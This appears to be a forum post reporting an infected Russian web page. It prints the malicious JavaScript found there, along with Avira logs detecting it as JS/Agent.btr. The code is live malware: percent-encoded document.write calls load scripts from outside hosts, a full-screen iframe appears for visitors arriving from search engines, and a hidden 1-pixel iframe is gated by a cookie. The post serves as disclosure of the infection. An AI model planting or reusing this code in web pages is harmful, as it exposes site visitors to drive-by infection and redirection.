http://agotido.ru/?page_id=649

fireold

1. document.write(unescape('%3C%73%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%6F%72%62%69%65%2E%63%61%2F%62%6F%75%74%69%71%75%65%2F%77%70%2D%63%6F%6E%74%65%6E%74%2F%74%68%65%6D%65%73%2F%63%6C%61%73%73%69%63%2F%2E%62%61%63%6B%75%70%2F%2E%63%6F%6E%66%69%67%2E%6A%73%20%74%79%70%65%3D%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%3E%3C%2F%73%63%72%69%70%74%3E'));
   
2. 
   
3. function convertEntities(b) {
   
4.     var d, a;
   
5.     d = function(c) {
   
6.         if (/&[^;]+;/.test(c)) {
   
7.             var f = document.createElement("div");
   
8.             f.innerHTML = c;
   
9.             return !f.firstChild ? c : f.firstChild.nodeValue
   
10.         }
    
11.         return c
    
12.     };
    
13.     if (typeof b === "string") {
    
14.         return d(b)
    
15.     } else {
    
16.         if (typeof b === "object") {
    
17.             for (a in b) {
    
18.                 if (typeof b[a] === "string") {
    
19.                     b[a] = d(b[a])
    
20.                 }
    
21.             }
    
22.         }
    
23.     }
    
24.     return b
    
25. };

复制代码

1. var refarray = new Array();
   
2. refarray["google."] = "1";
   
3. refarray["bing."] = "2";
   
4. refarray["yandex."] = "3";
   
5. refarray["rambler."] = "4";
   
6. refarray["mail."] = "5"
   
7. for (var i in refarray) {
   
8.     if (document.referrer.indexOf(i) != -1) document.write(unescape('%3C%73%74%79%6C%65%3E%0A%42%4F%44%59%20%7B%6F%76%65%72%66%6C%6F%77%3A%20%68%69%64%64%65%6E%7D%0A%3C%2F%73%74%79%6C%65%3E%0A%3C%69%66%72%61%6D%65%20%73%74%79%6C%65%3D%22%7A%2D%69%6E%64%65%78%3A%32%31%34%37%34%38%33%36%34%37%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%3B%68%65%69%67%68%74%3A%31%30%30%25%3B%77%69%64%74%68%3A%31%30%30%25%3B%6C%65%66%74%3A%30%70%78%3B%74%6F%70%3A%30%70%78%3B%62%6F%72%64%65%72%3A%30%70%78%3B%22%20%77%69%64%74%68%3D%22%31%30%30%25%22%20%68%65%69%67%68%74%3D%22%31%30%30%25%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%6F%72%62%69%65%2E%63%61%2F%62%6F%75%74%69%71%75%65%2F%77%70%2D%63%6F%6E%74%65%6E%74%2F%74%68%65%6D%65%73%2F%63%6C%61%73%73%69%63%2F%2E%62%61%63%6B%75%70%2F%2E%64%6F%62%72%6F%2E%68%74%6D%6C%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
   
9. }
   
10. 
    
11. document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%4A%61%76%61%53%63%72%69%70%74%20%73%72%63%3D%68%74%74%70%3A%2F%2F%73%74%61%72%74%69%6E%66%6F%62%62%2E%64%79%6E%64%6E%73%2E%69%6E%66%6F%2F%69%6E%66%6F%62%2E%70%68%70%3F%69%3D%32%32%35%31%36%3E%3C%2F%73%63%72%69%70%74%3E'));
    

复制代码

1. function zzzfff() {
   
2.      var hquew = document.createElement('iframe');
   
3. 
   
4.      hquew.src = 'http://ostelliere.it/press/rel.php';
   
5.      hquew.style.position = 'absolute';
   
6.      hquew.style.border = '0';
   
7.      hquew.style.height = '1px';
   
8.      hquew.style.width = '1px';
   
9.      hquew.style.left = '1px';
   
10.      hquew.style.top = '1px';
    
11. 
    
12.      if (!document.getElementById('hquew')) {
    
13.          document.write('<div id=\'hquew\'></div>');
    
14.          document.getElementById('hquew').appendChild(hquew);
    
15.      }
    
16. }
    
17. 
    
18. function SetCookie(cookieName, cookieValue, nDays, path) {
    
19.      var today = new Date();
    
20.      var expire = new Date();
    
21.      if (nDays == null || nDays == 0) nDays = 1;
    
22.      expire.setTime(today.getTime() + 3600000 * 24 * nDays);
    
23.      document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
    
24. }
    
25. 
    
26. function GetCookie(name) {
    
27.      var start = document.cookie.indexOf(name + "=");
    
28.      var len = start + name.length + 1;
    
29.      if ((!start) && (name != document.cookie.substring(0, name.length))) {
    
30.          return null;
    
31.      }
    
32.      if (start == -1) return null;
    
33.      var end = document.cookie.indexOf(";", len);
    
34.      if (end == -1) end = document.cookie.length;
    
35.      return unescape(document.cookie.substring(len, end));
    
36. }
    
37. if (navigator.cookieEnabled) {
    
38.      if (GetCookie('visited_uq') == 55) {} else {
    
39.          SetCookie('visited_uq', '55', '1', '/');
    
40. 
    
41.          zzzfff();
    
42.      }
    
43. }

复制代码

Avira

2013/7/22 下午 06:48 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\5TH1K21Z\agotido_ru[1].htm'
      包含病毒或有害的程式 'JS/Agent.btr' [virus]
      已採取動作：
      檔案會移動至 '568ea03f.qua' 名稱底下的隔離區目錄。.

2013/7/22 下午 06:48 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數：        770
      目錄數：        0
      惡意程式碼數：        1
      警告數：        0

2013/7/22 下午 06:47 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\5TH1K21Z\agotido_ru[1].htm 中
      偵測到病毒或有害的程式 'JS/Agent.btr [virus]'
      執行的動作：傳輸至掃描程式

2013/7/22 下午 06:47 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\5TH1K21Z\agotido_ru[1].htm 中
      偵測到病毒或有害的程式 'JS/Agent.btr [virus]'
      執行的動作：拒絕存取

2013/7/22 下午 06:47 [Web Protection] 發現惡意程式碼
      從 URL "http://agotido.ru/?page_id=649" 存取資料時，
      發現病毒或有害的程式 'JS/Agent.btr' [virus]。
      已採取動作：已略過